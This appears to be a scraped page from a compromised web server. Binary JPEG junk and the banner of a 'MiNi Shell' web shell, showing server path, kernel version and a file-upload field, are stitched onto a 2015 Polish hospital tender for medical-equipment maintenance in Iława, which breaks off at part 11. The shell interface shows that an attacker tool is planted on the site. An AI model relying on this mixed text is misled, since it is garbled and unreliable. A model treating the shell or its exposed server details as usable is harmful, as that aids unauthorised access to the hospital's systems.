JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150204/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150204/25306-N-2015.html

<p class="kh_header"><b>Iława: Przedmiotem zamówienia jest wykonanie usługi: przeglądów i konserwacji urządzeń medycznych w Powiatowym Szpitalu wraz z wymianą materiałów eksploatacyjnych przewidzianych do wymiany w ramach przeglądów i konserwacji przez producenta sprzętu w celu dopuszczenia sprzętu medycznego do dalszego użytkowania przez okres 36 miesięcy z podziałem na 15 zadań w Powiatowym Szpitalu im. Władysława Biegańskiego w Iławie nr sprawy 3/2015</b><br>
<b>Numer ogłoszenia: 25306 - 2015; data zamieszczenia: 04.02.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Szpital im. Władysława Biegańskiego w Iławie , ul. Gen. Wł. Andersa 3, 14-200 Iława, woj. warmińsko-mazurskie, tel. 89 6449601, faks 89 6492425.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> szpital.ilawa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest wykonanie usługi: przeglądów i konserwacji urządzeń medycznych w Powiatowym Szpitalu wraz z wymianą materiałów eksploatacyjnych przewidzianych do wymiany w ramach przeglądów i konserwacji przez producenta sprzętu w celu dopuszczenia sprzętu medycznego do dalszego użytkowania przez okres 36 miesięcy z podziałem na 15 zadań w Powiatowym Szpitalu im. Władysława Biegańskiego w Iławie nr sprawy 3/2015.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie usługi: przeglądów i konserwacji urządzeń medycznych w Powiatowym Szpitalu wraz z wymianą materiałów eksploatacyjnych przewidzianych do wymiany w ramach przeglądów i konserwacji przez producenta sprzętu w celu dopuszczenia sprzętu medycznego do dalszego użytkowania przez okres 36 miesięcy z podziałem na 15 zadań w Powiatowym Szpitalu im. Władysława Biegańskiego w Iławie nr sprawy 3/2015

Zadanie nr 1 Przeglądy techniczne inkubatorów
Zadanie nr 2 Przeglądy techniczne kardiostymulatorów
Zadanie nr 3 Przeglądy techniczne defibrylatora
Zadanie nr 4 Przeglądy techniczne elektroencefalografu
Zadanie nr 5 Przeglądy techniczne ergometru
Zadanie nr 6 Przeglądy techniczne rejestratorów
Zadanie nr 7 Przeglądy techniczne kardiomonitorów
Zadanie nr 8 Przeglądy techniczne Kolumn chirurgicznych
Zadanie nr 9 Przeglądy techniczne myjni automatycznej
Zadanie nr 10 Przeglądy techniczne pomp infuzyjnych
Zadanie nr 11 przeglądy techniczne regulatorów ssania
Zadanie nr 12 Przeglądy techniczne cieplarki i diatermii
Zadanie nr 13 Przeglądy techniczne Ssaków i podgrzewaczy płynów
Zadanie nr 14 Przeglądy techniczne ultrasonografu
Zadanie nr 15 Przeglądy techniczne sprężarki
 
1.	W skład przedmiotu zamówienia wchodzą w szczególności:
1.1.	 Przedmiot zamówienia obejmuje wszystkie niezbędne czynności wymagane w celu dopuszczenia w/w urządzeń medycznych do dalszego użytkowania zgodnie z instrukcją obsługi producenta sprzętu, w szczególności:
a)	utrzymanie sprawności techniczno - eksploatacyjnej urządzeń objętych niniejszym zamówieniem,
b)	konserwację i zachowanie gotowości eksploatacyjnej opartej o zalecenia Zamawiającego,
c)	przeprowadzanie okresowych przeglądów i kontroli stanu technicznego sprzętu medycznego,
d)	prowadzenie paszportów technicznych sprzętu medycznego tj. wprowadzanie każdorazowo wpisu o wykonanych czynnościach, uszkodzeniach oraz o dopuszczeniu lub nie urządzenia medycznego do dalszego użytkowania..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 15.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust.1 Ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust.1 Ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust.1 Ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust.1 Ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust.1 Ustawy Prawo zamówień publicznych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony formularz ofertowy 2. Wypełniony formularz specyfikacji przedmiotowej (formularz cenowy)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 97</li>
<li>2 - Termin płatności - 3</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.1. zmiana dotyczy nieistotnych postanowień zawartej umowy,
1.2.  podczas realizacji umowy wystąpią nieprzewidywalne zdarzenia lub okoliczności, jak w szczególności klęski żywiołowe, strajki, zamieszki, konflikty zbrojne, które uniemożliwiają zrealizowanie przedmiotu zamówienia w sposób, w zakresie i w terminie przewidzianym w ofercie.
1.3. w wyniku istotnej zmiany stosunków spełnianie świadczenia byłoby połączone z nadmiernymi trudnościami lub groziłoby, co najmniej jednej ze stron znaczną stratą, a czego strony nie mogły przewidzieć przy zawarciu umowy - w przypadku istotnej zmiany stosunków takiej jak znaczny wzrost cen surowców, nośników energii itp.
1.4.zmiana dotyczy obniżenia cen jednostkowych poszczególnych elementów przedmiotu zamówienia 
- w przypadku promocji, ogólnej obniżki cen na dany asortyment itp.
1.5.dotyczy zmian koniecznych ze względu na zmianę powszechnie obowiązujących przepisów prawa, 
w szczególności stawek podatku VAT, stawek celnych - w przypadku zaistnienia takich zmian.
1.6.konieczność wprowadzenia zmiany wynika z okoliczności, których nie można było przewidzieć 
w ogłoszeniu o zamówieniu lub specyfikacji istotnych warunków zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.ilawa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Szpital im. Władysława Biegańskiego w Iławie ul. Gen. Wł. Andersa 3 14-200 Iława.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.02.2015 godzina 10:00, miejsce: Powiatowy Szpital im. Władysława Biegańskiego w Iławie ul. Gen. Wł. Andersa 3 14-200 Iława Kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przeglądy techniczne inkubatorów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	   INKUBATOR          /  LK20222 	 ISOLETTE      C 2000  / 2008	POŁOŻNICZO - NOWORODKOWY	1
2.	   INKUBATOR        /    LK20223 	ISOLETTE      C 2000  / 2008	POŁOŻNICZO - NOWORODKOWY	1
3.	  INKUBATOR         /    LK20224	ISOLETTE      C 2000  / 2008	POŁOŻNICZO - NOWORODKOWY	1
4.	  INKUBATOR          /   LK20226	ISOLETTE      C 2000  / 2008	POŁOŻNICZO - NOWORODKOWY	1
5.	  INKUBATOR         /    LK20225	ISOLETTE      C 2000  / 2008	PEDIATRYCZNY	1
6.	INKUBATOR OTWARTY / 18038/2007	SRN10M 	POŁOŻNICZO - NOWORODKOWY	1
7	STANOWISKO DO RESUSCYTACJI nr  17-084	SRN10 	POŁOŻNICZO - NOWORODKOWY	1
9.	STANOWISKO INFAAUT VEMER  HCCD50174/2000	IWS 3400	BLOK OPERACYJNY	1
10.	LAMPA DO FOTOTERAPII nr  1301710	BILIBED	POŁOŻNICZO - NOWORODKOWY	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. Termin płatności - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przeglądy techniczne kardiostymulatorów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	KARDIOSTYMULATOR  / nr 663	  MIP-811	WEWNĘTRZNY	1
2.	KARDIOSTYMULATOR / nr 170	  ORMED	WEWNĘTRZNY	1
3.	KARDIOSTYMULATOR  / nr 789	  MIP-811	OIT	1
4.	STYMULATOR - STIMUPLEX   / nr  050058	HNS-12	Oddział Anestezjologii	1
5.	EKG                                      	Mr Red	ZESP. RATOWNICTWA	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. Termin płatności - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przeglądy techniczne defibrylatora.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Defibrylator                           / 10130545	DefiMax     2013r	NEUROLOGIA.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. Termin płatności - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Przeglądy techniczne elektroencefalografu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	ELEKTROENCEFALOGRAF (EEG)   
DWUSTANOWISKOWY
APARAT  z WIDEOMETRIĄ. 
Monitor do stanowiska  analizy. 
Monitor do stanowiska rejestracji.
Monitor biofeedback - jednostka centralna.
Stanowisko analizy  i rejestracji. Drukarka.
Kamera SONY.	
2009	NEUROLOGIA	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. Termin płatności - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Przeglądy techniczne ergometru.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	ERGOMETR 900 / nr 10913340
APARAT do BADAŃ WYSIŁKOWYCH	ERGOMETR 900	WEWNĘTRZNY.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Przeglądy techniczne rejestratorów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	  HOLTER HOLCARD 24W                        /  1110	BETE  SYSTEM  /2010	NEUROLOGIA	1
2.	REJESTRATOR  HOLCARD  / 0036	CR-07     / 2010	NEUROLOGIA	1
3.	REJESTRATOR HOLCARD   / 0035	CR-07     / 2010	NEUROLOGIA	1
4.	REJESTRATOR  ASPEKT       / 0026	702          / 2010	NEUROLOGIA	1
5.	REJESTRATOR  AsPEKT      / 0027                        	702         / 2010	NEUROLOGIA	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Przeglądy techniczne kardiomonitorów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Kardiomonitor                          / 3368	FX 2000MD        	NEUROLOGIA	1
  2.	Kardiomonitor                         / 3369	FX 2000MD        	NEUROLOGIA	1
    3.	Kardiomonitor                         / 3370  	FX 2000MD        	NEUROLOGIA	1
    4.	Kardiomonitor                         / 3371	FX 2000MD        	NEUROLOGIA	1
    5.	Kardiomonitor                        / 	FX 2000MD        	NEUROLOGIA	1
    6.	CENTRALA                           /  3372	FX 2000MD        	NEUROLOGIA	1
    7.	Kardiomonitor                      / 347	FX 2000MD        	OIT	1
    8.	Kardiomonitor                     / 348	FX 2000MD        	OIT	1
    9.	Kardiomonitor                     / 349	FX 2000MD        	OIT	1
    10.	Kardiomonitor                     / 350	FX 2000MD        	OIT	1
    11.	Kardiomonitor                     / 351	FX 2000MD        	OIT	1
    12.	CENTRALA                        / 352	FX 2000MD        	OIT	1
    13.	KARDIOMONITOR PODST.   /  4586	FX 2000 P	SOR	1
    14.	KARDIOMONITOR PODST.  /   4587
FX 2000 P	SOR	1
    15.	KARDIOMONITOR PODST.   /  4588	FX 2000 P	SOR	1
    16.	KARDIOMONITOR ROZSZ.  /  11130600   	FX 3000 	SOR	1
    17.	KARDIOMONITOR ROZSZ.  / 11130601	FX 3000 	SOR	1
18.	MONITOR DO POMIARÓW HEMODYNAMICZNYCH nr   334668008	 	OIT	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Przeglądy techniczne Kolumn chirurgicznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	KOLUMNA CHIRURGICZNA	 	BLOK OPERACYJNY	1
 2.	KOLUMNA CHIRURGICZNA	 	BLOK OPERACYJNY	1
 3.	KOLUMNA CHIRURGICZNA	 	BLOK OPERACYJNY	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Przeglądy techniczne myjni automatycznej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Myjnia automatyczna OLYMPUS ETD 3 BASIC PAA	  081130861	PRACOWNIA     ENDOSKOPII	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. Termin płatności - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Przeglądy techniczne pomp infuzyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Pompa infuzyjna  S1  /    0106801/09	2009	NEUROLOGIA	1
 2.	Pompa infuzyjna  S1  /    0106808/09	2009	NEUROLOGIA	1
 3.	Pompa infuzyjna  S1  /    0106811/09	2009	NEUROLOGIA	1
 4.	Pompa infuzyjna  S1  /    0106812/09	2009	NEUROLOGIA	1
 5.	Pompa infuzyjna S1     / 0106802/09	2009	             OIT	1
 6.	 Pompa infuzyjna  S1   /  0106803/09	2009	             OIT	1
 7.	 Pompa infuzyjna  S1  /   0106804/09                                                      	2009	             OIT	1
 8.	Pompa infuzyjna  S1  /    0106805/09	2009	             OIT	1
 9.	Pompa infuzyjna  S1  /    0106806/09	2009	             OIT	1
10.	Pompa infuzyjna  S1  /    0106807/09	2009	             OIT	1
11.	Pompa infuzyjna  S1  /    0106809/09	2009	             OIT	1
12.	Pompa infuzyjna  S1  /    0106810/09	2009	             OIT	1
13.	Pompa infuzyjna  S1  /    0106813/09	2009	             OIT	1
14.	Pompa infuzyjna  S1  /    0106814/09	2009	             OIT	1
15.	Pompa infuzyjna  S1  /   0106815/09	2009	             OIT	1
16.	Pompa infuzyjna  S1  /    0106816/09	2009	             OIT	1
17.	Pompa infuzyjna   pilot A2      / 18485277	2003	Pediatryczny	1
18.	Pompa infuzyjna   pilot A2      / 18485049	2003	Pediatryczny	1
19.	Pompa infuzyjna   pilot A2      / 18485425	2003	Pediatryczny	1
20.	Pompa infuzyjna  Perfursor   /  35970	2004	Zespół Rat.Med.	1
 21.	Pompa infuzyjna       AP12     /  2107	2004	Zespół Rat.Med.	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> przeglądy techniczne regulatorów ssania.</p>
